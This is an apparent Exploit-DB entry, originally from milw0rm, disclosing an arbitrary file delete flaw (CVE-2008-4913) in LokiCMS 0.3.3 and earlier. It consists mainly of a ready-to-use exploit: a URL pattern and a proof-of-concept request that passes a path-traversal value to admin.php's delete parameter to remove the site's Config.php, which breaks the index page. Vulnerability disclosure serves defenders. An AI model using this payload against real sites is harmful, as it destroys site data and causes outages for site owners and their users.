LokiCMS <= 0.3.3 - Arbitrary File Delete Vulnerability

2008-04-29T00:00:00
ID EDB-ID:5522
Type exploitdb
Reporter cOndemned
Modified 2008-04-29T00:00:00

Description

LokiCMS <= 0.3.3 Arbitrary File Delete Vulnerability. CVE-2008-4913. Webapps exploit for php platform

                                        
                                            Name   : LokiCMS 0.3.3 &lt;= Arbitrary File Delete Vulnerability
Author : cOndemned
Greetz : ZaBeaTy, GregStar, irk4z, doctor, Avantura ;*
    
Usage:

    http://[target]/[lokiCMS]/admin.php?delete=[path]/[file]
        
PoC:

    http://[target]/[lokiCMS]/admin.php?delete=../includes/Config.php
       
    Deleting Config.php will casue situation when users won't be able to view index page
    normally. Only errors will be visible...

# milw0rm.com [2008-04-29]